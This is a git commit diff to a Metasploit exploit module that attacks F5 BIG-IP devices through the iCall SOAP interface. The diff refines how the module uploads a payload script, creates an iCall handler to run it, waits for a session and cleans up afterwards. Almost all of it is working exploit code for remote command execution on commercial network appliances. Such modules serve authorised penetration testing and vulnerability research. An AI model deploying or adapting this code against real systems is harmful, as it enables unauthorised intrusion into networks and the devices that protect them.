Merge pull request #7 from jhart-r7/pr/fixup-6228

m0t · m0t · commit 26c88368f7fd · 2015-11-18T22:04:56.000+01:00
print_ improvements, better cleanup and prevent multiple sessions
diff --git a/modules/exploits/linux/http/f5_icall_cmd.rb b/modules/exploits/linux/http/f5_icall_cmd.rb
@@ -31,7 +31,8 @@ def initialize(info = {})
         'License'        => MSF_LICENSE,
         'Author'         =>
           [
-            'tom' # Discovery, Metasploit module
+            'tom', # Discovery, Metasploit module
+            'Jon Hart <jon_hart[at]rapid7.com>' # Metasploit module
           ],
         'References'     =>
           [
@@ -59,7 +60,7 @@ def initialize(info = {})
       ])
     register_advanced_options(
       [
-        OptInt.new('INTERVAL', [ true, 'Time interval before the iCall::Handler is called, in seconds', 3 ]),
+        OptInt.new('SESSION_WAIT', [ true, 'The max time to wait for a session, in seconds', 5 ]),
         OptString.new('PATH', [true, 'Filesystem path for the dropped payload', '/tmp']),
         OptString.new('FILENAME', [false, 'File name of the dropped payload, defaults to random']),
         OptInt.new('ARG_MAX', [true, 'Command line length limit', 131072])
@@ -138,18 +139,19 @@ def delete_script(script_name)
         end
       end
     end
-    send_soap_request(delete_xml)
+    print_error("Error while cleaning up script #{script_name}") unless (res = send_soap_request(delete_xml))
+    res
   end
 
-  def script_exists(script_name)
+  def script_exists?(script_name)
     exists_xml = build_xml do |xml|
       xml['scr'].get_list(SOAPENV_ENCODINGSTYLE)
     end
     res = send_soap_request(exists_xml)
     res && res.code == 200 && res.body =~ Regexp.new("/Common/#{script_name}")
   end
 
-  def create_handler(handler_name, script_name, interval)
+  def create_handler(handler_name, script_name)
     handler_xml = build_xml do |xml|
       xml['per'].create(SOAPENV_ENCODINGSTYLE) do
         xml.handlers(STRING_ATTRS) do
@@ -162,7 +164,11 @@ def create_handler(handler_name, script_name, interval)
         end
         xml.intervals(LONG_ATTRS) do
           xml.parent.namespace = xml.parent.parent.namespace_definitions.first
-          xml.item interval
+          # we set this to run once every 24h, but because there is no
+          # start/end time it will run once, more or less immediately, and
+          # again 24h from now, but by that point hopefully we will have
+          # cleaned up and the handler/script/etc are gone
+          xml.item 60*60*24
         end
       end
     end
@@ -180,10 +186,11 @@ def delete_handler(handler_name)
       end
     end
 
-    send_soap_request(delete_xml)
+    print_error("Error while cleaning up handler #{handler_name}") unless (res = send_soap_request(delete_xml))
+    res
   end
 
-  def handler_exists(handler_name)
+  def handler_exists?(handler_name)
     handler_xml = build_xml do |xml|
       xml['per'].get_list(SOAPENV_ENCODINGSTYLE)
     end
@@ -220,37 +227,44 @@ def exploit
       return false
     end
 
-    print_status('Uploading payload...')
-
-    script_name = Rex::Text.rand_text_alpha_lower(5)
+    script_name = "script-#{Rex::Text.rand_text_alphanumeric(16)}"
+    print_status("Uploading payload script #{script_name}")
     create_script_res = create_script(script_name, cmd)
     unless create_script_res && create_script_res.code == 200
-      print_error("Upload script failed")
+      print_error("Upload payload script failed")
       return false
     end
-    unless script_exists(script_name)
-      print_error("create_script() run successfully but script was not found")
+    unless script_exists?(script_name)
+      print_error("Payload script uploaded successfully but script was not found")
       return false
     end
     register_file_for_cleanup @payload_path
 
-    interval = datastore['INTERVAL']
-
     # phase 2: create iCall Handler, that will actually run the previously created script
-    print_status('Creating trigger...')
-    handler_name = Rex::Text.rand_text_alpha_lower(5)
-    unless create_handler(handler_name, script_name, interval)
-      print_error('Script uploaded but create_handler() failed')
+    handler_name = "handler-#{Rex::Text.rand_text_alphanumeric(16)}"
+    print_status("Creating trigger #{handler_name}")
+    unless create_handler(handler_name, script_name)
+      print_error('Payload script uploaded but trigger creation failed')
+      delete_script(script_name)
+      return false
+    end
+    unless handler_exists?(handler_name)
+      print_error("Trigger created successfully but was not found")
+      delete_script(script_name)
       return false
     end
-    print_status('Wait until payload is executed...')
+    print_status('Waiting for payload to execute...')
 
-    sleep(interval) # small delay, just to make sure
-    print_status('Trying cleanup...')
-    if delete_handler(handler_name) && delete_script(script_name)
-      print_status('Cleanup finished with no errors')
-    else
-      print_error('Error while cleaning up')
+    # if our payload has not been successfully executed just yet, wait
+    # until it does or give up
+    slept = 0
+    until session_created? || slept > datastore['SESSION_WAIT']
+      Rex.sleep(1)
+      slept += 1
     end
+
+    print_status('Trying cleanup...')
+    delete_script(script_name)
+    delete_handler(handler_name)
   end
 end
